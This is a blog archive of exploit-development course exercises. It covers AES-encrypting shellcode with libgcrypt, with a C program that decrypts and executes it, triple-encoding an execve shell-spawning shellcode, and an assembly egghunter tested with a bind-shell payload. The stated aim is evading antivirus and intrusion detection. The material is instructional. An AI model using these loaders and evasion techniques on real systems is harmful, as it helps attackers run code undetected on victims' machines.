AdSense

Showing posts with label LINUX ASSEMBLY EXPLOITATION. Show all posts
Showing posts with label LINUX ASSEMBLY EXPLOITATION. Show all posts

Tuesday, March 22, 2016

7 - Shellcode Encryption / Decryption



7 - SHELLCODE ENCRYPTION / DECRYPTION


1 - INTRODUCTION

The goal of this exercise is to implement encryption techniques on a shellcode with the purpose of evading Antivirus (AV) and Intrusion Detection Systems (IDS).

One of the most important concepts about Cryptography is to avoid the so called Security Through Obscurity (STO), meaning the usage of secrecy on the design of security. A system relying on STO may have security due to the unknown of its inherent flaws, so allegedly it would be difficult for the attackers to find them. However, general practice and academy institutions agree that the truth of the matter is exactly the contrary: the robustness of any security measure increases as it can be proved and tested publicly by the professional community. In this regard, the National Institute of Standards and Technology (NIST) in the United States specifically discourages the use of STO: "System security should not depend on the secrecy of the implementation or its components." In other words, according to Kerckhoffs' doctrine (XIXth century) "the security of a system should depend on its key, not on its design remaining obscure."


For this reason, instead of trying to develop my own cryptographic methods, I have preferred to rely on a well known cryptographic algorithm (Advanced Encryption Standard, AES) and a well tested cryptographic library (Libgcrypt).

AES, aka Rijndael, was selected by the NIST and adopted by the US government in 2001 as one of the most preferred encryption algorithm of electronic data. Based on a the design principle substitution - permutation network, uses a fixed block size of 128 bits, and possible key size of 128, 192 or 256 bits. AES is a symmetric criptographic algorithm, so same key must be used for encryption and encryption.


Libgcrypt is a general purpose cryptographic library based on the code from GnuPG. Libgcrypt provides a high level interface using an extensible and flexible API for all cryptograhic building blocks: symmetric ciphers, hash algorithms and public key algorithms. Libgcrypt works on most POSIX systems. It’s Free Software, so anybody can use, modify, and redistribute it under the terms of the GNU Lesser General Public License. 

https://gnupg.org/documentation/manuals/gcrypt/

2 - ORIGINAL SHELLCODE

- The original shellcode used in this assignment is very simple, and it will be used as a proof of concept to demonstrate the process of encryption and decryption of a common shellcode. 

- Let's have a look to the assembly code of original.nasm:



global _start
section .text
_start:

xor eax,eax
mov al,0x4

xor ebx,ebx
mov bl,0x1

xor edx,edx
push edx

push 0x0a202020
push 0x54454e2e
push 0x45425554
push 0x59544952
push 0x55434553
push 0x2e575757

mov ecx,esp
mov dl,0x18   
int 0x80

xor eax,eax
mov al,0x1

int 0x80

- Once compiled, linked and executed, it can be verified that the task associated with the shellcode is to print a message on the console:






- Indeed, the message sounds familiar to the SLAE community ... :)

- Finally, a shellcode is extracted from original.nasm:




- This shellcode will be used along this exercise to be encrypted and decrypted, and finally executed.

3 - ENCRYPTION STEP BY STEP

- Both the encrypting and decrypting programs will be written in language C

- Starting with the header files, <gcrypt.h> must be included because all interfaces (data types and functions) of the library are defined there:

#include <gcrypt.h>

- Then, some macros are defined that will be used along the whole program. Cipher AES and Counter mode are determined, and also the sizes for key and block of operation:

#define algo GCRY_CIPHER_AES128
#define mode GCRY_CIPHER_MODE_CTR
#define KEY_LENGTH 16
#define BLOCK_LENGTH 16

- The original shellcode is inserted:

uint8_t shellcode[] = "\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x31\xd2\x52\x68\x20\x20\x20\x0a\x68\x2e\x4e\x45\x54\x68\x54\x55\x42\x45\x68\x52\x49\x54\x59\x68\x53\x45\x43\x55\x68\x57\x57\x57\x2e\x89\xe1\xb2\x18\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

- The variable for encriptedShellcode is defined, but left blank for the moment:

uint8_t encriptedShellcode[] = " ";

- The key is introduced, consisting of 16 Bytes. Same key will be used later for decryption, because AES is a symmetric crytographic algorithm:

const char *key = "0123456789abcdef"; 


- Initialization Vectors (IVs) are used as a fixed-size input to cryptographic primitives. Usually IVs are random, what helps to avoid the repetition of patterns. In this way distinct ciphertexts are produced even when the same plaintext being encrypted multiple times and independently with the same key. However, in this case I have chosen a simple one for easiness of the exercise. Anyway, same IV should be used later for decryption:

uint8_t IV[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";  


Counter mode of operation allows to use a stream cipher, generating a keystream block by encrypting successive values of a "counter". The counter can be any function which produces a sequence which is guaranteed not to repeat for a long time, although an increment by one is usual:


uint8_t ctr[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";   

- A function for encryption is created:

static void encryption(int algo, size_t size, uint8_t *encriptedShellcode)

- To use a cipher algorithm with libgcrypt a "handle" must be allocated:

        gcry_cipher_hd_t handle;

- Creating the required context for the "handle":

         gcry_cipher_open(&handle, algo, mode, 0);

- The key is introduced:

         gcry_cipher_setkey(handle, key, KEY_LENGTH );

- The IV is set:

         gcry_cipher_setiv(handle, IV, BLOCK_LENGTH);

- The counter is set:

         gcry_cipher_setctr(handle, ctr, BLOCK_LENGTH);

- Encryption is performed:

         gcry_cipher_encrypt(handle, encriptedShellcode, size, shellcode, size);

- Finally, the "handle" is released:

        gcry_cipher_close(handle);

- Inside main() the encryption function is called and encriptedShellcode returned:

encryption(algo, size, encriptedShellcode);

- The output encriptedShellcode is printed:

printf("Encrypted shellcode = ");
while(i<size){
printf("\\x%02x", encriptedShellcode[i]);
i++;
    }

- The whole program encryption_AES_128.c:



#include <stdio.h>
#include <string.h>
#include <gcrypt.h>
#include <stdint.h>

#define algo GCRY_CIPHER_AES128
#define mode GCRY_CIPHER_MODE_CTR
#define KEY_LENGTH 16
#define BLOCK_LENGTH 16

uint8_t shellcode[] = "\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x31\xd2\x52\x68\x20\x20\x20\x0a\x68\x2e\x4e\x45\x54\x68\x54\x55\x42\x45\x68\x52\x49\x54\x59\x68\x53\x45\x43\x55\x68\x57\x57\x57\x2e\x89\xe1\xb2\x18\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

uint8_t encriptedShellcode[] = "";

const char *key = "0123456789abcdef"; 
uint8_t IV[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";  
uint8_t ctr[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";   

static void encryption(int algo, size_t size, uint8_t *encriptedShellcode){
        gcry_cipher_hd_t handle;
gcry_cipher_open(&handle, algo, mode, 0);
gcry_cipher_setkey(handle, key, KEY_LENGTH );
gcry_cipher_setiv(handle, IV, BLOCK_LENGTH);
gcry_cipher_setctr(handle, ctr, BLOCK_LENGTH);
gcry_cipher_encrypt(handle, encriptedShellcode, size, shellcode, size);
gcry_cipher_close(handle);
}

int main(void){

int i=0;
int size = strlen(shellcode);

encryption(algo, size, encriptedShellcode);

printf("\n");

printf("Encrypted shellcode = ");
while(i<size){
printf("\\x%02x", encriptedShellcode[i]);
i++;
    }

    printf("\n\n");

    return 0;

}


- Compiling  with option -lgcryp the program encryption_AES_128.c:




- Executing encryption_AES_128.c, output is the result of encrypting the original shellcode:










4 - DECRYPTION STEP BY STEP

- Because the decryption program shares many instructions with the encryption one, I will just discuss the differences between them.

- First of all, the last output shellcode is inserted as the encriptedShellcode[]:

uint8_t encriptedShellcode[] = "\x8f\x06\x94\x69\xa4\xe9\xc4\x03\x4a\xdb\x3d\x28\x2d\x02\x77\xaa\x45\x41\x38\x94\x1d\x45\x83\xa1\xba\x16\x60\x3b\xb4\x19\x9f\xfb\x23\x39\x53\x87\xce\x69\x9c\x79\x2e\x12\xf2\xd4\x52\x9e\xfb\xe7\xbe\x5a\x03\x9e\x93";


- gcry_cipher_decrypt must be used in this case, being the input parameter encriptedShellcode and the output decriptedShellcode:

gcry_cipher_decrypt(handle, decriptedShellcode, size, encriptedShellcode, size);

- Once decriptedShellcode is achieved it can be printed, to check whether it matches the original one:

printf("Decrypted shellcode = ");
while(i<size){
printf("\\x%02x", decriptedShellcode[i]);
i++;
        }

- Finally, decriptedShellcode is executed:

int (*ret)() = (int(*)())decriptedShellcode;
ret();

- The whole decryption_AES_128.c program:



#include <stdio.h>
#include <string.h>
#include <gcrypt.h>
#include <stdint.h>

#define algo GCRY_CIPHER_AES128
#define mode GCRY_CIPHER_MODE_CTR
#define KEY_LENGTH 16
#define BLOCK_LENGTH 16

uint8_t encriptedShellcode[] = "\x8f\x06\x94\x69\xa4\xe9\xc4\x03\x4a\xdb\x3d\x28\x2d\x02\x77\xaa\x45\x41\x38\x94\x1d\x45\x83\xa1\xba\x16\x60\x3b\xb4\x19\x9f\xfb\x23\x39\x53\x87\xce\x69\x9c\x79\x2e\x12\xf2\xd4\x52\x9e\xfb\xe7\xbe\x5a\x03\x9e\x93";

uint8_t decriptedShellcode[] = "";

const char *key = "0123456789abcdef";
uint8_t IV[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";
uint8_t ctr[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\xf0\x10";

static void decryption(int algo, size_t size, uint8_t *decriptedShellcode){
        gcry_cipher_hd_t handle;
        gcry_cipher_open(&handle, algo, mode, 0);
        gcry_cipher_setkey(handle, key, KEY_LENGTH);
        gcry_cipher_setiv(handle, IV, BLOCK_LENGTH);
        gcry_cipher_setctr(handle, ctr, BLOCK_LENGTH);
        gcry_cipher_decrypt(handle, decriptedShellcode, size, encriptedShellcode, size);
        gcry_cipher_close(handle);
}

int main(void){

int i=0;
int size = strlen(encriptedShellcode);

decryption(algo, size, decriptedShellcode);

printf("\n");

printf("Decrypted shellcode = ");
while(i<size){
printf("\\x%02x", decriptedShellcode[i]);
i++;
        }

printf("\n\n");

int (*ret)() = (int(*)())decriptedShellcode;
ret();

printf("\n\n");

        return 0;
}

- Compiling  with option -lgcryp the program decryption_AES_128.c:




- The execution is successful because the original shellcode is correctly decrypted and the output matches the expected message WWW.SECURITYTUBE.NET







Friday, March 18, 2016

4 - Triple Encoding


4 - TRIPLE ENCODING


1 - INTRODUCTION

Encoding is one of the techniques used to evade AntiVirus (AV) and Intrusion Detection Systems (IDS) when writing shellcodes. The goal of this exercise is to apply a three phase encoding process to a well-known program, demonstrating that with the appropiate decoder the functionality of the program remains, whereas the pattern of the shellcode is severely changed. Overlaying three different techniques the resulting shellcode can be distorted in a better way than applying just one technique.


2 - TRIPLE ENCODING / DECODING STEP BY STEP


- First of all, let's take a shellcode to be encoded / decoded. The well-known execve-stack.nasm is an easy program whose effect is to spwan a shell: 




- Once compiled, linked and tested, a shellcode can be extracted from execve-stack.nasm:




- This shellcode will be encoded using three different techniques, one after the other. For that purpose a Python script is used:

i) the original shellcode is ROL-ed byte by byte twice. For this purpose this function is used:

rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \

    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

http://www.falatic.com/index.php/108/python-and-bitwise-rotation

ROL bitwise operator rotates a number to the left .  As used at the Python script:

y = rol (x, 2, 8) <-- accepts x (byte) as input (8 bytes) and rotates it twice to the left.

ii) bytes resultant from last step are complemented with NOT operator: z = ~y

iii) a number is added to each one othe the bytes, 7 in this case: t = z + 7







- Once the Python script is executed, the result is a new shellcode that is the consequence of applying three consecutive encoding techniques:




- Now, a decoder program A4.nasm is created. The decoding process must be done in reverse order than the encoding:

i) 7 is substracted to each one of the bytes: sub byte [esi],0x07 
ii) Bytes are complemented with NOT operator: not byte [esi]
iii) Bytes are ROR-ed twice: ror byte [esi], 0x2

- The whole program A4.nasm:




- A4.nasm is compiled and linked:




- There are no null opcodes:




3 - TESTING 

- To create a testing program a shellcode is extracted from A4.nasm:










- The shellcode is applied to ShellcodeTest.c:






- Compiling ShellcodeTest.c:






- Executing ShellcodeTest.c the test is successful, because a shell is spawn, as expected:


















4 - ANALYZING WITH GDB

- gdb is launched for ShellcodeTest:







- A breakpoint is set where the shellcode is located:








- Running the program:





- Disassembling, "call" instruction for the shellcode is detected:




- A second breakpoint is set, just before "call" instruction:




- The execution of the program continues:







- Disassembling, instructions from the original program execve-stack.nasm are detected, confirming that the decoding process has been successful:





- Starting again gdb and executing the whole program the shellcode is spawn, as expected:







Tuesday, March 15, 2016

3 - Egghunter Shellocde


3 - EGGHUNTER SHELLCODE

1 - INTRODUCTION

One of the issues associated with shellcodes is the lack of space for storage. While with typical stack based buffer overflows the buffer size is usually big enough to hold the shellcode, however problems arise when there are not enough available consecutive memory locations to insert the shellcode. 

One technique to address this problem is to use certain parts of the VAS (Virtual Address Space) to which access is not always easy. To facilitate access to the shellcode one usual technique is the creation of a so called "egg", consisting of a number of easily identifiable pattern of bytes 

The "egg" is prepended to the shellcode, marking the beginning of it. Subsequently a program called "egghunter" would be created with the function of searching the "egg" until finding it. Once detected,  the flux of the program execution would jump to it, then running the shellcode

The "Egghunter" program should have the following characteristics:

1) robustness: since the search occurs in unallocated memory regions inside the VAS, there is a danger that the entire program fails if an improper dereference occurs. Therefore, the program must be enough robust to avoid runtime errors or segmentation fault.

2) small size: the program should occupy a small space to impact as less as possible on memory regions.

3) speed: the search process must be fast enough to not slow down the efficiency of the associated payload.

Regarding the "egg", the byte pattern must be unique and identifiable in the memory space, so that no collision with other byte strings occurs. For example, a set of repeated characters ensure uniqueness, as it would decrease the probability of existence of a similar pattern in the rest of the program. 

Also the "egg" should be easily executable and harmless, since the transfer of execution to the rest of shellcode (payload) must be produced simply and immediately. Although it would be possible to include an "offset" in the "egghunter" to prevent the execution of the "egg", this option is not considered advisable because it would result in an unnecessary increase in the size of the total shellcode.



2 - EGGHUNTER PROGRAM STEP BY STEP

- Basically, the "egghunter" program searchs inside memory addresses until finding the pattern of the "egg". Then, the memory address where the "egg" is located is loaded into the eip and the associated code is executed. -

- Let's examine step by step the program A3.nasm.

- The first two instructions are equivalent to setting 0x1000 value on ecx, which purpose is a page alignment on the pointer of the address to be validated (hold by ecx, as we see later). Page alignment means putting the data at a memory address equal to some multiple of the page size, which increases the system's performance due to the way the CPU handles memory. Page size is usually determined by processor architecture, being 4096 Bytes the smallest page size provided by the x86 platform.

- In the Ubuntu machine running this exercise:

root@lic:/# getconf PAGE_SIZE
4096

- The OR logical operation with 0xfff outputs 0xfff (1111 1111 1111), because any bit OR-ed with 1 is 1.

or cx,0xfff

- Increasing 0xfff by 1 outputs 0x1000 = 4096 (PAGE_SIZE). In this way, ecx is incremented 16 Bytes every time this instruction is called, so that progressively all addresses are visited: 

inc ecx

- Why to divide this process into 2 operations instead of directly moving 0x1000 into ecx? The reason is that either instruction will be jumped distinctly, as seen from later instructions. Let's difference two cases:

i) If an invalid memory address is returned the first instruction will be jumped (label "alignment"). In this case the page alignment is necessary because it can be assumed that all addresses inside the page are also invalid. 

ii) If a valid memory address is returned the first instruction can be skipped (label "alignment"), , going directly to the second one (label "increment") and the pointer increased to the next valid address. This process would continue until the egg is found.

- Next, the sigaction() syscall is used to validate multiple addresses of the VAS at the same time, using the kernel's "verify-area" routine. In this way, every time an address is supplied the "verify-routine" ensures that there are 16 Bytes of contiguous memory to be validated.

root@lic:/# man sigaction

NAME    sigaction - examine and change a signal action
SYNOPSIS    int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);
DESCRIPTION   The sigaction() system call is used to change the action taken by a process on receipt of a specific signal. 
       - signum specifies the signal and can be any valid signal except SIGKILL and SIGSTOP.
       - If act is non-NULL, the new action for signal signum is installed from act.  
       - If oldact is non-NULL, the previous action is saved in oldact.
RETURN VALUE        sigaction() returns 0 on success; on error, -1 is returned, and errno is set to indicate the error.
ERRORS       EFAULT act or oldact points to memory which is not a valid part of the process address space.

- The identifier for sigaction() is 67=0x43:

root@lic:/usr/include/i386-linux-gnu/asm# cat unistd_32.h
#define __NR_sigaction 67


- According with the usual register layout for Linux IA-32, arguments for sigaction() must be located in these registers:

eax <- syscall identifier = 0x43
ebx <- signum
ecx <- act = pointer to the region of memory addresses to be validated 
edx <- oldact = saves the previous action

- sigaction() syscall is invoked:

xor eax,eax
mov al, 0x43
int 0x80

- Now, the pointed memory addresss by ecx must be validated. Linux System Errors is a set of codes returned when system requests fail. EFAULT error code is returned when a system call finds an invalid memory address, indicating that a the pointer provided to the system call was not valid. In this way, the Egghunter program can safely travel across the VAS without deferencing invalid memory regions. Because the return value of the sigaction() syscall has been sent to eax, the low part of eax register must be compared with the low byte of the error code EFAULT:

cmp al, 0xf2;

- In case of eax matching the EFAULT error code it means the address is invalid, and the process must start again jumping to the first label "alignment":

je alignment

- Otherwise, once ensured the memory address region is valid with no errors, the code of the "egg" is moved to eax in reverse order. The "egg" consists of 32 bytes, but is divided into two 16 Bytes segments to facilitate the later comparison of 16 Bytes memory address regions held by edi, as seen on next instruction. 

- About the content of the "egg" itself, it is recommended to be executable. For instance, let's take a series of instructions std (opcode 0xfd) and cld (opcode 0xfc). The effect of both instructions is nothing because eventually the direction flag is cleared:

mov eax, 0xfcfdfcfd

- Now, the actual address being searched, located in ecx, is moved to edi:

mov edi,ecx

- The assembly instruction scasd allows to compare two strings. The first string would be the content of the first word inside eax (first part of the "egg" code), and the second string would be the value of edi (memory address being searched), setting the flags accordingly. 

scasd

- In case of no matching the program jumps to label "increment" searching for the next memory address:

jnz increment

 - In case of matching the second word of the "egg" is compared:

scasd

- Again, in case of no matching, the program jumps to label "increment", searching for the next memory address:

jnz increment

- Eventually, when the two words of the code match, the "egg" is found. Then, the control of the program jumps unconditionally to the register edi, where is located the "egg" and the subsequent payload, and finally the shellcode is executed:

jmp edi

- The whole program A3.nasm:

global _start:
section .text
_start:

alignment:                 ; page alignment 
  or cx,0xfff
increment:                 ; next address
inc ecx
xor eax,eax
mov al, 0x43        ; sigaction() syscall
int 0x80
cmp al,0xf2               ; EFAULT error code
je alignment              ; jump in case of invalid address
mov eax,0xfcfdfcfd   ; loading the "egg" into eax
mov edi,ecx              ; loading the current address into edi
scasd                        ; comparing with the first word of "egg"
jnz increment            ; jump in case of no matching
scasd                        ; comparing with the second word of "egg"
jnz increment            ; jump in case of no matching
jmp edi                      ; in case of matching "egg", jump unconditionally to execute the "egg"
                                        ; and the rest of the shellcode

3 - TESTING EGGHUNTER

- Assembling and linking A3.nasm:






- Extracting the shellcode:



- For testing purposes, the Shell Bind TCP program from A1 will be used. Applying the shellcode extraction from A3.nasm to ShellcodeTest.c:



- Compiling ShellcodeTest.c:



- Executing ShellcodeTest.c:



- Using nc from other console, the execution of the Shell Bind TCP shellcode is successful: